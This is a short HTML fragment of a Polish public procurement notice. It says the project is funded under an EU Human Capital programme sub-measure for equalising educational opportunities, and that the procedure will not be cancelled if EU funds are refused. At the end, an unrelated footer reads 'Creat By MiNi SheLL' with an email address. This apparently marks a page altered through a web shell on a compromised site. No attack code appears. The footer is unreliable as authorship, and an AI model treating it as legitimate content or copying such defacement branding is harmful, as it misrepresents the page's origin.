<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt realizowany będzie w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet IX Rozwój wykształcenia i kompetencji w regionach, Poddziałanie 9.1.2 Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszanie różnic w jakości usług edukacyjnych..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com